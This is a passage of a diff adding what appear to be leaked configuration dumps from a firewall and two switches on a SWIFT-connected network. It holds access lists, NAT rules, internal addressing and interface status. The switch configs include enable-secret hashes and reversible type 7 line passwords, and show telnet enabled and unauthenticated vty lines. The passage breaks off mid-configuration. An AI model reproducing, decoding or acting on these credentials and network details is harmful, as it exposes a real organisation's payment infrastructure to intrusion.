+ network-object vpn1-int 255.255.255.255
+ network-object vpn2-int 255.255.255.255
+ network-object vpn1-2-nsrp 255.255.255.255
+ network-object vpn3-int 255.255.255.255
+ network-object vpn3-mgmt 255.255.255.255
+object-group network swift-switch-in
+ network-object 149.134.244.129 255.255.255.255
+ network-object 149.134.244.130 255.255.255.255
+ network-object 149.134.252.4 255.255.255.255
+ network-object 149.134.252.6 255.255.255.255
+ network-object 149.134.252.128 255.255.255.255
+ network-object 149.134.252.129 255.255.255.255
+object-group network swift-dns
+ network-object 149.134.244.133 255.255.255.255
+ network-object 149.134.252.7 255.255.255.255
+object-group network swift-directory
+ network-object 149.134.244.129 255.255.255.255
+ network-object 149.134.244.130 255.255.255.255
+ network-object 149.134.252.4 255.255.255.255
+ network-object 149.134.252.6 255.255.255.255
+ network-object 149.134.252.128 255.255.255.255
+ network-object 149.134.252.129 255.255.255.255
+ network-object 149.134.252.132 255.255.255.255
+object-group network swift-ca-ra
+ network-object 149.134.244.131 255.255.255.255
+ network-object 149.134.252.2 255.255.255.255
+ network-object 149.134.252.130 255.255.255.255
+object-group network swift-rvs
+ network-object 149.134.244.133 255.255.255.255
+ network-object 149.134.244.134 255.255.255.255
+ network-object 149.134.252.7 255.255.255.255
+ network-object 149.134.252.8 255.255.255.255
+ network-object 149.134.252.133 255.255.255.255
+object-group network swift-web-connector
+ network-object 149.134.244.133 255.255.255.255
+ network-object 149.134.244.134 255.255.255.255
+ network-object 149.134.252.7 255.255.255.255
+ network-object 149.134.252.8 255.255.255.255
+ network-object 149.134.252.133 255.255.255.255
+object-group network swift-secrets-webserver
+ network-object 149.134.252.8 255.255.255.255
+ network-object 149.134.244.134 255.255.255.255
+ network-object 149.134.252.133 255.255.255.255
+object-group network swift-myswift-webserver
+ network-object 149.134.244.134 255.255.255.255
+ network-object 149.134.252.8 255.255.255.255
+ network-object 149.134.252.133 255.255.255.255
+ network-object 149.134.128.254 255.255.255.255
+ network-object 149.134.129.254 255.255.255.255
+object-group network swift-switch-out
+ network-object 149.134.244.129 255.255.255.255
+ network-object 149.134.244.130 255.255.255.255
+ network-object 149.134.252.4 255.255.255.255
+ network-object 149.134.252.6 255.255.255.255
+ network-object 149.134.252.128 255.255.255.255
+ network-object 149.134.252.129 255.255.255.255
+object-group network swift-dialup
+ network-object 149.134.255.254 255.255.255.255
+object-group service msih-ports-udp udp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48002 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+object-group service msih-ports-udp-casmf udp
+ port-object range 5101 5105
+ port-object range 5206 5207
+object-group service swift-dns-port udp
+ port-object range domain domain
+object-group service symantec-av udp
+ port-object range 38293 38293
+ port-object range 2967 2967
+object-group service FMSIH-OUT-TCP tcp
+ port-object range 9100 9106
+ port-object range 6500 6501
+object-group service FMSIH-OUT-TCP-CASMF tcp
+ group-object FMSIH-OUT-TCP
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service FMSIH-PRINT-TCP tcp
+ port-object range 9100 9100
+object-group service msih-ports-tcp tcp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+object-group service msih-ports-tcp-casmf tcp
+ group-object msih-ports-tcp
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service snmp tcp-udp
+ port-object range 161 162
+object-group service doubletake tcp-udp
+ port-object range 1105 1106
+ port-object range 1100 1100
+object-group service msih-ports tcp-udp
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 9000 9049
+ port-object range 1029 1029
+object-group service shared-ports tcp
+ port-object range 445 445
+ port-object range netbios-ssn netbios-ssn
+ port-object range 137 137
+object-group service swift-49168-9 tcp
+ port-object range 49168 49169
+object-group service swift-cara-port tcp
+ port-object range 709 709
+object-group service swift-dialup-port tcp
+ port-object eq www
+object-group service swift-direcotry-ports tcp
+ port-object range 1400 1409
+ port-object range 1600 1609
+ port-object range 1100 1109
+ port-object range ldap ldap
+ port-object range 1300 1309
+ port-object range 1500 1509
+ port-object range 1200 1209
+object-group service swift-myswift-webserver-port tcp
+ port-object range https https
+object-group service swift-rvs-port tcp
+ port-object range 49170 49170
+object-group service swift-secrets-webserver-port tcp
+ port-object range 49172 49172
+object-group service swift-switch-ports tcp
+ port-object range 50153 50190
+ port-object range 52100 52399
+ port-object range 49500 49510
+ port-object range 50200 50806
+object-group service swift-web-connector-ports tcp
+ port-object eq www
+ port-object range 49171 49171
+object-group service vnc-port tcp
+ port-object range 5800 5800
+ port-object range 5900 5900
+object-group network sag-srv-test
+ network-object sag-test 255.255.255.255
+object-group network sag-servers-prod_ref
+ network-object 192.168.246.25 255.255.255.255
+ network-object 192.168.246.20 255.255.255.255
+object-group network ensb-dxb-nw
+ network-object ensb-dxb-nw 255.255.255.0
+object-group service web-ports tcp
+ port-object eq www
+ port-object eq https
+object-group network mgmt-srv-group
+ network-object mgmt-srv1 255.255.255.255
+object-group network mgmt-srv-group_ref
+ network-object 192.168.246.110 255.255.255.255
+object-group network swp-srvrs
+ network-object swp-srvr-cluster 255.255.255.255
+object-group service swp-tcp-ports tcp
+ port-object range 48600 48600
+ port-object eq https
+object-group network swp-srvrs_ref
+ network-object 192.168.246.30 255.255.255.255
+object-group network mgmt-srv-group_ref_1
+ network-object 192.168.219.10 255.255.255.255
+object-group network sag-servers-prod_ref_1
+ network-object 192.168.219.25 255.255.255.255
+ network-object 192.168.219.20 255.255.255.255
+access-list clients_access_in extended permit ip any any inactive
+access-list clients_access_in extended permit icmp any any
+access-list clients_access_in extended permit tcp any object-group sag-servers-p
+rod_ref eq 48002
+access-list clients_access_in extended permit tcp any object-group sag-servers-p
+rod_ref eq 48003
+access-list clients_access_in remark ADD MSAEED 18JUL@)11
+access-list clients_access_in extended permit tcp any object-group swp-srvrs_ref
+ object-group swp-tcp-ports
+access-list clients_access_in extended permit tcp object-group ensb-dxb-nw objec
+t-group sag-servers-prod_ref eq 3389
+access-list clients_access_in extended permit tcp ensb-mgmt-nw 255.255.255.0 obj
+ect-group sag-servers-prod_ref eq 3389
+access-list clients_access_in extended permit tcp ensb-mgmt-nw 255.255.255.0 obj
+ect-group swp-srvrs_ref eq 3389
+access-list clients_access_in extended permit tcp ensb-mgmt-nw 255.255.255.0 obj
+ect-group mgmt-srv-group_ref eq 3389
+access-list clients_access_in extended permit tcp ensb-support-nw 255.255.255.0
+object-group sag-servers-prod_ref eq 3389
+access-list clients_access_in extended permit tcp ensb-support-nw 255.255.255.0
+object-group mgmt-srv-group_ref eq 3389
+access-list clients_access_in extended permit tcp object-group ensb-dxb-nw any e
+q 3389
+access-list clients_access_in remark ADD MSAEED 18JUL@)11
+access-list clients_access_in extended permit icmp any object-group swp-srvrs_re
+f
+access-list sag_access_in extended permit icmp any any
+access-list sag_access_in extended permit ip any any
+access-list sag_access_in remark ADD MSAEED 18JUL2011
+access-list sag_access_in extended permit ip object-group sag-servers-prod objec
+t-group swp-srvrs
+access-list sag_access_in remark ADD MSAEED 18JUL2011
+access-list sag_access_in extended permit icmp object-group sag-servers-prod obj
+ect-group swp-srvrs
+access-list sag_access_in remark ADD MSAEED 18JUL2011
+access-list sag_access_in extended permit ip object-group mgmt-srv-group object-
+group swp-srvrs
+access-list sag_access_in remark ADD MSAEED 18JUL2011
+access-list sag_access_in extended permit icmp object-group mgmt-srv-group objec
+t-group swp-srvrs
+access-list swift_access_in extended permit ip any any
+access-list swift_access_in remark ADD MSAEED 18JUL2011
+access-list swift_access_in extended permit ip swiftnet-nw 255.255.0.0 object-gr
+oup swp-srvrs
+access-list swift_access_in remark ADD MSAEED 18JUL2011
+access-list swift_access_in extended permit icmp swiftnet-nw 255.255.0.0 object-
+group swp-srvrs
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit ip object-group swp-srvrs object-group
+ sag-servers-prod
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit icmp object-group swp-srvrs object-gro
+up sag-servers-prod_ref_1
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit ip object-group swp-srvrs object-group
+ mgmt-srv-group_ref_1
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit icmp object-group swp-srvrs object-gro
+up mgmt-srv-group_ref_1
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit ip object-group swp-srvrs swiftnet-nw
+255.255.0.0
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit icmp object-group swp-srvrs swiftnet-n
+w 255.255.0.0
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit ip object-group swp-srvrs any
+access-list dmz_access_in remark ADD by MSAEED 18JUL2011
+access-list dmz_access_in extended permit icmp object-group swp-srvrs any
+access-list dmz_pnat_inbound extended permit ip host swp-srvr-cluster swiftnet-n
+w 255.255.0.0
+access-list sag_pnat_outbound_V3 extended permit ip host sag-srv2 swiftnet-nw 25
+5.255.0.0
+pager lines 24
+logging enable
+logging standby
+logging asdm warnings
+mtu sag 1500
+mtu clients 1500
+mtu swift 1500
+mtu dmz 1500
+failover
+failover lan unit primary
+failover lan interface failover Ethernet0/3
+failover interface ip failover 10.20.0.1 255.255.255.0 standby 10.20.0.2
+asdm image disk0:/asdm506.bin
+no asdm history enable
+arp timeout 14400
+global (swift) 1 sag-srv2
+nat (dmz) 1 access-list dmz_pnat_inbound outside
+static (sag,swift) sag-srv1 sag-srv1 netmask 255.255.255.255
+static (sag,swift) sag-test sag-test netmask 255.255.255.255
+static (sag,clients) 192.168.246.22 sag-test netmask 255.255.255.255
+static (sag,clients) 192.168.246.25 sag-srv1 netmask 255.255.255.255
+static (sag,clients) 192.168.246.20 sag-srv2 netmask 255.255.255.255
+static (sag,clients) 192.168.246.110 mgmt-srv1 netmask 255.255.255.255
+static (dmz,clients) 192.168.246.30 swp-srvr-cluster netmask 255.255.255.255
+static (dmz,clients) 192.168.246.28 swp-srvr1 netmask 255.255.255.255
+static (sag,dmz) 192.168.219.25 sag-srv1 netmask 255.255.255.255
+static (sag,dmz) 192.168.219.22 sag-test netmask 255.255.255.255
+static (sag,dmz) 192.168.219.20 sag-srv2 netmask 255.255.255.255
+static (sag,dmz) 192.168.219.110 mgmt-srv1 netmask 255.255.255.255
+static (sag,swift) sag-srv2  access-list sag_pnat_outbound_V3
+access-group sag_access_in in interface sag
+access-group clients_access_in in interface clients
+access-group swift_access_in in interface swift
+access-group dmz_access_in in interface dmz
+route clients 10.82.0.0 255.255.0.0 vpn3-int 1
+route clients 0.0.0.0 0.0.0.0 vpn1-2-nsrp 1
+route swift swiftnet-nw 255.255.0.0 192.168.244.30 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
+timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00
+timeout mgcp-pat 0:05:00 sip 0:30:00 sip_media 0:02:00
+timeout uauth 0:05:00 absolute
+http server enable
+http 192.168.202.0 255.255.255.0 sag
+http 192.168.1.0 255.255.255.0 dmz
+no snmp-server location
+no snmp-server contact
+snmp-server enable traps snmp authentication linkup linkdown coldstart
+telnet 192.168.202.0 255.255.255.0 sag
+telnet timeout 5
+ssh timeout 5
+console timeout 0
+dhcpd lease 3600
+dhcpd ping_timeout 50
+tftp-server sag mgmt-srv1 /
+Cryptochecksum:a6442190bc37addd95fdde00719002ee
+: end
+ENSBPASA1#
+
+
+
+
+ENSBPASA1# show int
+Interface Ethernet0/0 "sag", is up, line protocol is up
+  Hardware is i82546GB rev03, BW 100 Mbps
+        Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
+        MAC address 001b.0ce2.4698, MTU 1500
+        IP address 192.168.202.1, subnet mask 255.255.255.0
+        97790164 packets input, 13420314935 bytes, 0 no buffer
+        Received 775045 broadcasts, 0 runts, 0 giants
+        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
+        0 L2 decode drops
+        105536624 packets output, 43453902145 bytes, 0 underruns
+        0 output errors, 0 collisions
+        0 late collisions, 0 deferred
+        input queue (curr/max blocks): hardware (0/0) software (0/0)
+        output queue (curr/max blocks): hardware (0/10) software (0/0)
+  Traffic Statistics for "sag":
+        97790164 packets input, 11474995521 bytes
+        105536624 packets output, 41423614565 bytes
+        296167 packets dropped
+      1 minute input rate 9 pkts/sec,  1091 bytes/sec
+      1 minute output rate 11 pkts/sec,  1084 bytes/sec
+      1 minute drop rate, 0 pkts/sec
+      5 minute input rate 10 pkts/sec,  2011 bytes/sec
+      5 minute output rate 12 pkts/sec,  1499 bytes/sec
+      5 minute drop rate, 0 pkts/sec
+Interface Ethernet0/1 "clients", is up, line protocol is up
+  Hardware is i82546GB rev03, BW 100 Mbps
+        Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
+        MAC address 001b.0ce2.4699, MTU 1500
+        IP address 192.168.246.1, subnet mask 255.255.255.0
+        87317478 packets input, 38968875541 bytes, 0 no buffer
+        Received 58983 broadcasts, 0 runts, 0 giants
+        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
+        0 L2 decode drops
+        79673272 packets output, 9601731613 bytes, 0 underruns
+        0 output errors, 0 collisions
+        0 late collisions, 0 deferred
+        input queue (curr/max blocks): hardware (1/0) software (0/0)
+        output queue (curr/max blocks): hardware (0/13) software (0/0)
+  Traffic Statistics for "clients":
+        87317478 packets input, 37326932936 bytes
+        79673272 packets output, 8037363465 bytes
+        529966 packets dropped
+      1 minute input rate 8 pkts/sec,  689 bytes/sec
+      1 minute output rate 7 pkts/sec,  861 bytes/sec
+      1 minute drop rate, 0 pkts/sec
+      5 minute input rate 9 pkts/sec,  894 bytes/sec
+      5 minute output rate 8 pkts/sec,  1542 bytes/sec
+      5 minute drop rate, 0 pkts/sec
+Interface Ethernet0/2 "swift", is up, line protocol is up
+  Hardware is i82546GB rev03, BW 100 Mbps
+        Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
+        MAC address 001b.0ce2.469a, MTU 1500
+        IP address 192.168.244.1, subnet mask 255.255.255.0
+        14326554 packets input, 2914757876 bytes, 0 no buffer
+        Received 12037 broadcasts, 0 runts, 0 giants
+        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
+        0 L2 decode drops
+        14890989 packets output, 2987826809 bytes, 0 underruns
+        0 output errors, 0 collisions
+        0 late collisions, 0 deferred
+        input queue (curr/max blocks): hardware (1/0) software (0/0)
+        output queue (curr/max blocks): hardware (0/6) software (0/0)
+  Traffic Statistics for "swift":
+        14326554 packets input, 2611084577 bytes
+        14890989 packets output, 2679368480 bytes
+        12130 packets dropped
+      1 minute input rate 0 pkts/sec,  189 bytes/sec
+      1 minute output rate 0 pkts/sec,  149 bytes/sec
+      1 minute drop rate, 0 pkts/sec
+      5 minute input rate 1 pkts/sec,  359 bytes/sec
+      5 minute output rate 1 pkts/sec,  397 bytes/sec
+      5 minute drop rate, 0 pkts/sec
+Interface Ethernet0/3 "failover", is up, line protocol is up
+  Hardware is i82546GB rev03, BW 100 Mbps
+        Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
+        Description: LAN Failover Interface
+        MAC address 001b.0ce2.469b, MTU 1500
+        IP address 10.20.0.1, subnet mask 255.255.255.0
+        16705866 packets input, 1542463032 bytes, 0 no buffer
+        Received 985 broadcasts, 0 runts, 0 giants
+        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
+        0 L2 decode drops
+        16705900 packets output, 1587027436 bytes, 0 underruns
+        0 output errors, 0 collisions
+        0 late collisions, 0 deferred
+        input queue (curr/max blocks): hardware (0/0) software (0/0)
+        output queue (curr/max blocks): hardware (0/3) software (0/0)
+  Traffic Statistics for "failover":
+        16705866 packets input, 1241757412 bytes
+        16705900 packets output, 1286292326 bytes
+        0 packets dropped
+      1 minute input rate 1 pkts/sec,  89 bytes/sec
+      1 minute output rate 1 pkts/sec,  92 bytes/sec
+      1 minute drop rate, 0 pkts/sec
+      5 minute input rate 1 pkts/sec,  89 bytes/sec
+      5 minute output rate 1 pkts/sec,  92 bytes/sec
+      5 minute drop rate, 0 pkts/sec
+Interface Management0/0 "dmz", is up, line protocol is up
+  Hardware is i82557, BW 100 Mbps
+        Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
+        MAC address 001b.0ce2.469c, MTU 1500
+        IP address 192.168.219.1, subnet mask 255.255.255.0
+        35626045 packets input, 5253746628 bytes, 0 no buffer
+        Received 17285787 broadcasts, 0 runts, 0 giants
+        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
+        0 L2 decode drops
+        16394577 packets output, 3156794667 bytes, 0 underruns
+        0 output errors, 0 collisions, 0 interface resets
+        0 babbles, 0 late collisions, 0 deferred
+        0 lost carrier, 0 no carrier
+        input queue (curr/max blocks): hardware (128/128) software (0/30)
+        output queue (curr/max blocks): hardware (0/11) software (0/1)
+  Traffic Statistics for "dmz":
+        35531013 packets input, 4726805937 bytes
+        16426219 packets output, 2866498891 bytes
+        4265107 packets dropped
+      1 minute input rate 1 pkts/sec,  293 bytes/sec
+      1 minute output rate 1 pkts/sec,  226 bytes/sec
+      1 minute drop rate, 0 pkts/sec
+      5 minute input rate 1 pkts/sec,  222 bytes/sec
+      5 minute output rate 0 pkts/sec,  177 bytes/sec
+      5 minute drop rate, 0 pkts/sec
+ENSBPASA1#
+
+
+
+ENSBPASA1# show route
+
+S    0.0.0.0 0.0.0.0 [1/0] via vpn1-2-nsrp, clients
+C    10.20.0.0 255.255.255.0 is directly connected, failover
+S    10.82.0.0 255.255.0.0 [1/0] via vpn3-int, clients
+S    swiftnet-nw 255.255.0.0 [1/0] via 192.168.244.30, swift
+C    192.168.202.0 255.255.255.0 is directly connected, sag
+C    192.168.219.0 255.255.255.0 is directly connected, dmz
+C    192.168.244.0 255.255.255.0 is directly connected, swift
+C    192.168.246.0 255.255.255.0 is directly connected, clients
+ENSBPASA1#
+
+ENSBPASA1# show xlat
+13 in use, 34 most used
+Global 192.168.219.25 Local sag-srv1
+Global 192.168.219.22 Local sag-test
+Global 192.168.219.20 Local sag-srv2
+Global 192.168.219.110 Local mgmt-srv1
+Global sag-srv1 Local sag-srv1
+Global sag-test Local sag-test
+Global sag-srv2 Local sag-srv2
+Global 192.168.246.22 Local sag-test
+Global 192.168.246.25 Local sag-srv1
+Global 192.168.246.20 Local sag-srv2
+Global 192.168.246.110 Local mgmt-srv1
+Global 192.168.246.30 Local swp-srvr-cluster
+Global 192.168.246.28 Local swp-srvr1
+ENSBPASA1#
+
+ENSBPASA1# show failover
+Failover On
+Failover unit Primary
+Failover LAN Interface: failover Ethernet0/3 (up)
+Unit Poll frequency 1 seconds, holdtime 15 seconds
+Interface Poll frequency 15 seconds
+Interface Policy 1
+Monitored Interfaces 4 of 250 maximum
+Version: Ours 7.0(6), Mate 7.0(6)
+Last Failover at: 12:15:33 PKT Jun 6 2012
+        This host: Primary - Active
+                Active time: 13920273 (sec)
+                slot 0: ASA5510 hw/sw rev (2.0/7.0(6)) status (Up Sys)
+                slot 1: empty
+                Interface sag (192.168.202.1): Normal
+                Interface clients (192.168.246.1): Normal
+                Interface swift (192.168.244.1): Normal
+                Interface dmz (192.168.219.1): Normal (Waiting)
+        Other host: Secondary - Failed
+                Active time: 0 (sec)
+                slot 0: ASA5510 hw/sw rev (2.0/7.0(6)) status (Up Sys)
+                slot 1: empty
+                Interface sag (192.168.202.2): Normal
+                Interface clients (192.168.246.2): Normal
+                Interface swift (192.168.244.2): Normal
+                Interface dmz (0.0.0.0): No Link (Waiting)
+
+Stateful Failover Logical Update Statistics
+        Link : Unconfigured.
+
+ENSBPASA1#
+
+
+

swift/00566_3_SW1-Configuration.txt

@@ -0,0 +1,289 @@
+ENSBPSW1#show run
+Building configuration...
+
+Current configuration : 2541 bytes
+!
+version 12.2
+no service pad
+service timestamps debug uptime
+service timestamps log uptime
+service password-encryption
+!
+hostname ENSBPSW1
+!
+enable secret 5 $1$f0Nw$swJhU3TQLB8qAvSJ5PZ9t/
+!
+no aaa new-model
+udld enable
+
+ip subnet-zero
+!
+no ip domain-lookup
+!
+!
+!
+no file verify auto
+!
+spanning-tree mode pvst
+spanning-tree loopguard default
+spanning-tree extend system-id
+spanning-tree vlan 1-10 priority 4096
+!
+vlan internal allocation policy ascending
+!
+interface GigabitEthernet0/1
+ switchport mode access
+!
+interface GigabitEthernet0/2
+ switchport mode access
+!
+interface GigabitEthernet0/3
+ switchport mode access
+!
+interface GigabitEthernet0/4
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/5
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/6
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/7
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/8
+ switchport access vlan 2
+ switchport mode access
+!
+interface GigabitEthernet0/9
+ switchport access vlan 2
+ switchport mode access
+!
+interface GigabitEthernet0/10
+ switchport access vlan 2
+ switchport mode access
+!
+interface GigabitEthernet0/11
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/12
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/13
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/14
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/15
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/16
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/17
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/18
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/19
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/20
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/21
+!
+interface GigabitEthernet0/22
+!
+interface GigabitEthernet0/23
+ switchport mode trunk
+!
+interface GigabitEthernet0/24
+ switchport mode trunk
+!
+interface Vlan1
+ ip address 192.168.202.241 255.255.255.0
+ no ip route-cache
+!
+ip default-gateway 192.168.202.1
+ip http server
+!
+control-plane
+!
+!
+line con 0
+ password 7 123954121C453F26042E303F3C27294227
+ login
+line vty 0 4
+ password 7 047B5A03016F7F6C271C11001D1907550A
+ login
+line vty 5 15
+ password 7 06265E2442003A3B2B12061C0316217A04
+ no login
+!
+end
+
+ENSBPSW1#
+
+
+
+ENSBPSW1#show vtp status
+VTP Version                     : 2
+Configuration Revision          : 6
+Maximum VLANs supported locally : 255
+Number of existing VLANs        : 11
+VTP Operating Mode              : Server
+VTP Domain Name                 : ENSBP
+VTP Pruning Mode                : Disabled
+VTP V2 Mode                     : Disabled
+VTP Traps Generation            : Disabled
+MD5 digest                      : 0x61 0xC7 0x6F 0x53 0xF6 0x7B 0x43 0x6B
+Configuration last modified by 192.168.202.241 at 7-10-93 19:00:20
+Local updater ID is 192.168.202.241 on interface Vl1 (lowest numbered VLAN inter
+face found)
+ENSBPSW1#
+
+
+ENSBPSW1#show vlan
+
+VLAN Name                             Status    Ports
+---- -------------------------------- --------- -------------------------------
+1    default                          active    Gi0/1, Gi0/2, Gi0/3, Gi0/21
+                                                Gi0/22
+2    swift                            active    Gi0/8, Gi0/9, Gi0/10
+3    sag                              active
+4    vpinin                           active    Gi0/4, Gi0/5, Gi0/6, Gi0/7
+5    outside                          active    Gi0/15, Gi0/16, Gi0/17, Gi0/18
+                                                Gi0/19, Gi0/20
+7    dialin                           active    Gi0/11, Gi0/12, Gi0/13, Gi0/14
+219  DMZ                              active
+1002 fddi-default                     act/unsup
+1003 token-ring-default               act/unsup
+1004 fddinet-default                  act/unsup
+1005 trnet-default                    act/unsup
+
+VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
+---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
+1    enet  100001     1500  -      -      -        -    -        0      0
+2    enet  100002     1500  -      -      -        -    -        0      0
+3    enet  100003     1500  -      -      -        -    -        0      0
+4    enet  100004     1500  -      -      -        -    -        0      0
+5    enet  100005     1500  -      -      -        -    -        0      0
+
+VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
+---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
+7    enet  100007     1500  -      -      -        -    -        0      0
+219  enet  100219     1500  -      -      -        -    -        0      0
+1002 fddi  101002     1500  -      -      -        -    -        0      0
+1003 tr    101003     1500  -      -      -        -    -        0      0
+1004 fdnet 101004     1500  -      -      -        ieee -        0      0
+1005 trnet 101005     1500  -      -      -        ibm  -        0      0
+
+Remote SPAN VLANs
+------------------------------------------------------------------------------
+
+
+Primary Secondary Type              Ports
+------- --------- ----------------- ------------------------------------------
+
+ENSBPSW1#
+
+
+ENSBPSW1#show int trunk
+
+Port        Mode         Encapsulation  Status        Native vlan
+Gi0/23      on           802.1q         trunking      1
+Gi0/24      on           802.1q         trunking      1
+
+Port        Vlans allowed on trunk
+Gi0/23      1-4094
+Gi0/24      1-4094
+
+Port        Vlans allowed and active in management domain
+Gi0/23      1-5,7,219
+Gi0/24      1-5,7,219
+
+Port        Vlans in spanning tree forwarding state and not pruned
+Gi0/23      1-5,7,219
+Gi0/24      1-5,7,219
+
+
+
+
+
+ENSBPSW1#show int status
+
+Port      Name               Status       Vlan       Duplex  Speed Type
+Gi0/1                        connected    1          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/2                        connected    1          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/3                        connected    1          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/4                        connected    4          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/5                        notconnect   4            auto   auto 10/100/1000Ba
+seTX
+Gi0/6                        connected    4          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/7                        notconnect   4            auto   auto 10/100/1000Ba
+seTX
+Gi0/8                        connected    2          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/9                        connected    2          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/10                       notconnect   2            auto   auto 10/100/1000Ba
+seTX
+Gi0/11                       connected    7          a-full a-1000 10/100/1000Ba
+seTX
+
+Port      Name               Status       Vlan       Duplex  Speed Type
+Gi0/12                       notconnect   7            auto   auto 10/100/1000Ba
+seTX
+Gi0/13                       notconnect   7            auto   auto 10/100/1000Ba
+seTX
+Gi0/14                       notconnect   7            auto   auto 10/100/1000Ba
+seTX
+Gi0/15                       connected    5          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/16                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/17                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/18                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/19                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/20                       connected    5          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/21                       connected    1          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/22                       notconnect   1            auto   auto Not Present
+Gi0/23                       connected    trunk      a-full a-1000 10/100/1000Ba
+seTX
+Gi0/24                       connected    trunk      a-full a-1000 10/100/1000Ba
+seTX
+ENSBPSW1#
+
+
+
+
+
+

swift/00566_4_SW2-Configuration.txt

@@ -0,0 +1,283 @@
+ENSBPSW2#show run
+Building configuration...
+
+Current configuration : 2557 bytes
+!
+version 12.2
+no service pad
+service timestamps debug uptime
+service timestamps log uptime
+service password-encryption
+!
+hostname ENSBPSW2
+!
+enable secret 5 $1$VgG3$nWvp3RizKjLzPDRTVdWF51
+!
+no aaa new-model
+udld enable
+
+ip subnet-zero
+!
+no ip domain-lookup
+!
+!
+!
+no file verify auto
+!
+spanning-tree mode pvst
+spanning-tree loopguard default
+spanning-tree extend system-id
+!
+vlan internal allocation policy ascending
+!
+interface GigabitEthernet0/1
+ switchport mode access
+!
+interface GigabitEthernet0/2
+ switchport mode access
+!
+interface GigabitEthernet0/3
+ switchport mode access
+!
+interface GigabitEthernet0/4
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/5
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/6
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/7
+ switchport access vlan 4
+ switchport mode access
+!
+interface GigabitEthernet0/8
+ switchport access vlan 2
+ switchport mode access
+!
+interface GigabitEthernet0/9
+ switchport access vlan 2
+ switchport mode access
+!
+interface GigabitEthernet0/10
+ switchport access vlan 2
+ switchport mode access
+!
+interface GigabitEthernet0/11
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/12
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/13
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/14
+ switchport access vlan 7
+ switchport mode access
+!
+interface GigabitEthernet0/15
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/16
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/17
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/18
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/19
+ switchport access vlan 5
+ switchport mode access
+!
+interface GigabitEthernet0/20
+ switchport access vlan 219
+ switchport mode access
+!
+interface GigabitEthernet0/21
